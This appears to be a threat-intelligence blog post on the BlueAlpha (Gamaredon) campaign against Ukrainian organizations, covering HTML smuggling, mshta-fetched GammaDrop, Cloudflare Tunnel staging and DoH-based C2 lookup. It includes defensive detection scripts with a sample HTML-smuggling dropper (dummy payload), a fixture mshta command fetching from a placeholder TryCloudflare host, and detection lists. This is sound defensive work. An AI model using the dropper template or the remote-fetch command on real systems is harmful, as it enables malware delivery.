
BlueAlpha, a Russian state-sponsored hacking group, is using Cloudflare Tunnels, a service that publishes a server through Cloudflare's network and hides its real address, to conceal the infrastructure behind its attacks on Ukrainian organizations

The group stages its malware on servers that are reachable only through Cloudflare Tunnels, including the free TryCloudflare service. Victims connect to a Cloudflare-owned hostname rather than to the attacker's own server, so the hosting infrastructure is hard to trace, reputation-based blocking of the download is far less effective, and the malware can be delivered with a lower chance of detection.

About BlueAlpha 

BlueAlpha, a Russian cyber-espionage group linked to the FSB and tracked by other vendors as Gamaredon, has been active since 2013. The group relies on custom malware such as GammaDrop and GammaLoad to get into networks and stay there, and increasingly places its staging infrastructure behind legitimate services like Cloudflare so that its servers blend in with ordinary traffic. Its recent operations fit a broader pattern of Russian state-sponsored activity aimed at gathering intelligence and disrupting adversaries.

Attack Flow 

The intrusions begin with a spear-phishing email carrying an HTML attachment. The attachment uses HTML smuggling: the file to be delivered is stored inside the HTML as an encoded blob and reassembled by JavaScript in the victim's browser, so no executable or archive crosses the mail gateway and attachment filters see only an HTML document. The script is triggered by an event handler such as onerror or onmousemove and drops a malicious shortcut (.lnk) file. Opening the shortcut launches mshta.exe, which fetches the GammaDrop payload from a staging server that sits behind a Cloudflare Tunnel and is reached through a TryCloudflare subdomain.
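The attachment-side check that the mitigation list below asks for can be prototyped as a static triage of the HTML itself. The script that follows is an added example written for this page, not code from Insikt Group or from the campaign; the indicator patterns (the two event handlers named on this page plus onload, and the browser APIs that turn an inline blob into a downloaded file) are my choice, and the sample "smuggling" page is constructed here with a dummy string in place of a real archive.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators."""
import base64
import re
from html.parser import HTMLParser

# Event handlers called out in the report (onerror, onmousemove) plus onload,
# which is commonly used to fire smuggling code without any user action.
SUSPICIOUS_EVENTS = {"onerror", "onmousemove", "onload"}

# Browser APIs used to reassemble an inline blob and drop it as a file.
DROPPER_APIS = [
    r"atob\s*\(",
    r"new\s+Blob\s*\(",
    r"createObjectURL\s*\(",
    r"msSaveOrOpenBlob\s*\(",
    r"\.download\s*=",
    r"Uint8Array\s*\(",
]

# A long run of base64 characters anywhere in the document.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


class _Collector(HTMLParser):
    """Gathers event-handler attributes and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.event_handlers = []   # (tag, attribute) pairs
        self.scripts = []          # inline script bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower() in SUSPICIOUS_EVENTS:
                self.event_handlers.append((tag.lower(), name.lower()))
        if tag.lower() == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage_html(html: str) -> dict:
    """Return the indicator hits and a verdict for one HTML document."""
    parser = _Collector()
    parser.feed(html)
    script_text = "\n".join(parser.scripts)
    apis = [p for p in DROPPER_APIS if re.search(p, script_text)]

    # Decode every long base64 run so the verdict can weigh the payload size.
    blob_bytes = 0
    for match in BASE64_BLOB.finditer(html):
        stripped = match.group(0).rstrip("=")
        try:
            blob_bytes += len(base64.b64decode(stripped + "=" * (-len(stripped) % 4)))
        except ValueError:
            pass  # not valid base64 after all; ignore this run

    # A suspicious handler, a dropper API and an embedded blob together are
    # the classic smuggling shape; two of the three is enough to block.
    score = bool(parser.event_handlers) + bool(apis) + bool(blob_bytes)
    return {
        "event_handlers": parser.event_handlers,
        "dropper_apis": apis,
        "embedded_blob_bytes": blob_bytes,
        "verdict": "block" if score >= 2 else ("review" if score == 1 else "clean"),
    }


# Constructed samples. The "payload" is a dummy string, not a real archive.
DUMMY_PAYLOAD = base64.b64encode(b"not a real archive " * 20).decode()
SMUGGLING_HTML = f"""<html><body>
<img src="x" onerror="drop()">
<script>
function drop() {{
  var raw = atob("{DUMMY_PAYLOAD}");
  var bytes = new Uint8Array(raw.length);
  for (var i = 0; i < raw.length; i++) bytes[i] = raw.charCodeAt(i);
  var blob = new Blob([bytes], {{type: "application/octet-stream"}});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "document.7z";
  a.click();
}}
</script></body></html>"""
BENIGN_HTML = """<html><body><p>Quarterly report attached.</p>
<script>document.title = "Report";</script></body></html>"""

if __name__ == "__main__":
    for label, doc in (("smuggling", SMUGGLING_HTML), ("benign", BENIGN_HTML)):
        print(label, triage_html(doc))
```

The scoring deliberately needs two independent signals: a lone onerror handler is common in ordinary marketing mail, and a lone base64 run may be an embedded image, but either of them together with Blob/createObjectURL and a download attribute is hard to explain innocently.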

To frustrate static analysis, the scripts are obfuscated with junk code and misleading variable names. GammaDrop is the first stage: once it runs it writes the next stage to disk and sets up persistence, and from there GammaLoad, the custom backdoor BlueAlpha uses to keep long-term access, is deployed. The backdoor's command-and-control (C2) channel is what the group then uses for credential theft, data exfiltration and further access into the network.

The GammaLoad variant observed in this campaign is VBScript-based. To locate its C2 servers it resolves their domains through conventional DNS and, when that fails, through DNS over HTTPS (DoH).

If the normal resolver returns no answer, for example because the enterprise DNS server blocks or sinkholes the domain, GammaLoad queries public DoH resolvers such as Google's and Cloudflare's instead. DoH travels inside ordinary HTTPS on port 443, so the lookup bypasses DNS-layer filtering and never appears in the enterprise resolver's logs. On top of this, BlueAlpha fast-fluxes the C2 domains, rotating the IP addresses they resolve to at short intervals, which makes IP-based blocking and infrastructure tracing harder still.

Mitigation (as recommended by Insikt Group) 

  • Enhance email security to detect and block HTML smuggling; in particular, inspect HTML attachments for event handlers such as onerror and onmousemove that run script without a deliberate click, combined with encoded blobs and file-drop APIs.
  • Prevent unauthorized execution of mshta.exe (for example through application control rules) and block untrusted .lnk files. Monitor any mshta.exe activity that does run, especially command lines that reference remote URLs.
  • Create network monitoring rules that flag and examine traffic to *.trycloudflare.com subdomains. The free TryCloudflare service needs no account and gives any host an instantly trusted hostname, which is why it is increasingly abused.
  • Log DoH traffic, including connections from non-browser processes to known public DoH resolvers over port 443, and enforce a policy that allows DoH only through sanctioned resolvers.
  • Use threat intelligence and SecOps intelligence sources to identify threats targeting your organization and its partners.
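The mshta.exe, TryCloudflare, DoH and fast-flux points above, and the DNS/DoH fallback described in the attack flow, can be turned into rule logic over endpoint telemetry. What follows is an added example for this page, not a rule set from Insikt Group: it runs over a constructed batch of Sysmon-style events (process creation, DNS query and network connection, as JSON lines). The browser allowlist, the fast-flux threshold and the DoH resolver lists are assumptions of mine; the hostnames are placeholders and the IP addresses come from the RFC 5737 documentation ranges, so none of them are indicators from the report.

```python
"""Rule logic for the host and network indicators in the mitigation list,
run over constructed Sysmon-style events (JSON, one event per line)."""
import json
from collections import defaultdict

# Assumed allowlist: browsers that legitimately speak DoH. Any other process
# reaching a public DoH resolver is reported as unauthorised DoH.
DOH_ALLOWED_IMAGES = {"chrome.exe", "firefox.exe", "msedge.exe"}
DOH_RESOLVER_HOSTS = {"dns.google", "cloudflare-dns.com", "one.one.one.one"}
DOH_RESOLVER_IPS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "1.0.0.1"}
FAST_FLUX_MIN_IPS = 4  # distinct A records for one name within the batch (assumed)


def _image_name(path):
    """Basename of a Windows image path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Sysmon event 1 (process creation): Image, ParentImage, CommandLine."""
    hits = []
    image = _image_name(ev["Image"])
    cmd = ev["CommandLine"].lower()
    if image == "mshta.exe":
        if "http://" in cmd or "https://" in cmd:
            hits.append("mshta_remote_content")
        # Heuristic: a double-clicked .lnk makes explorer.exe the parent, and
        # mshta.exe launched that way is rarely legitimate.
        if _image_name(ev.get("ParentImage", "")) == "explorer.exe":
            hits.append("mshta_spawned_by_explorer")
    if "trycloudflare.com" in cmd:
        hits.append("trycloudflare_in_cmdline")
    return hits


def check_dns(ev):
    """Sysmon event 22 (DNS query): Image, QueryName, QueryResults."""
    hits = []
    name = ev["QueryName"].lower()
    if name.endswith(".trycloudflare.com"):
        hits.append("trycloudflare_dns_query")
    if name in DOH_RESOLVER_HOSTS and _image_name(ev["Image"]) not in DOH_ALLOWED_IMAGES:
        hits.append("doh_resolver_lookup_by_unexpected_process")
    return hits


def check_network(ev):
    """Sysmon event 3 (network connection): Image, DestinationIp, DestinationPort."""
    if (ev["DestinationIp"] in DOH_RESOLVER_IPS and ev["DestinationPort"] == 443
            and _image_name(ev["Image"]) not in DOH_ALLOWED_IMAGES):
        return ["doh_connection_by_unexpected_process"]
    return []


def fast_flux_candidates(dns_events):
    """Names whose answers churn across many distinct IPs inside the batch.
    Sysmon records A records in QueryResults as '::ffff:a.b.c.d;'."""
    seen = defaultdict(set)
    for ev in dns_events:
        for token in ev.get("QueryResults", "").split(";"):
            if token.startswith("::ffff:"):
                seen[ev["QueryName"].lower()].add(token[len("::ffff:"):])
    return {name for name, ips in seen.items() if len(ips) >= FAST_FLUX_MIN_IPS}


def run(lines):
    """Apply every rule to JSON event lines; return (rule, subject) pairs."""
    alerts, dns_events = [], []
    for line in lines:
        ev = json.loads(line)
        if ev["EventID"] == 1:
            hits = check_process(ev)
        elif ev["EventID"] == 22:
            hits = check_dns(ev)
            dns_events.append(ev)
        elif ev["EventID"] == 3:
            hits = check_network(ev)
        else:
            hits = []
        alerts.extend((h, _image_name(ev["Image"])) for h in hits)
    alerts.extend(("fast_flux_candidate", n) for n in sorted(fast_flux_candidates(dns_events)))
    return alerts


# Constructed sample events: placeholder hostnames, RFC 5737 documentation IPs.
_STAGER = "placeholder-words.trycloudflare.com"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": f"mshta.exe https://{_STAGER}/"},
    {"EventID": 22, "Image": r"C:\Windows\System32\mshta.exe",
     "QueryName": _STAGER, "QueryResults": "::ffff:198.51.100.7;"},
    {"EventID": 22, "Image": r"C:\Windows\System32\wscript.exe",
     "QueryName": "dns.google", "QueryResults": "::ffff:8.8.8.8;"},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "1.1.1.1", "DestinationPort": 443},  # browser DoH: allowed
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
] + [
    {"EventID": 22, "Image": r"C:\Windows\System32\wscript.exe",
     "QueryName": "c2-placeholder.example", "QueryResults": f"::ffff:203.0.113.{i};"}
    for i in range(1, 5)
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for rule, subject in run(SAMPLE_LINES):
        print(f"{rule:45s} {subject}")
```

The DoH check keys on the destination port, not the resolver address alone: 8.8.8.8 and 1.1.1.1 on port 53 is ordinary DNS, while the same addresses on 443 from a script host is DoH from something that should not be doing its own resolution. The fast-flux heuristic only produces candidates, since CDN-fronted names also rotate addresses; it is meant to prioritise, not to block on its own.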

Want your digital assets to be protected? 

CyberShelter provides modern cybersecurity products and niche services that protect individuals and organizations against all kinds of cyber threats.

For the latest cyber threats and hacking news, follow us on Facebook, LinkedIn, and Twitter.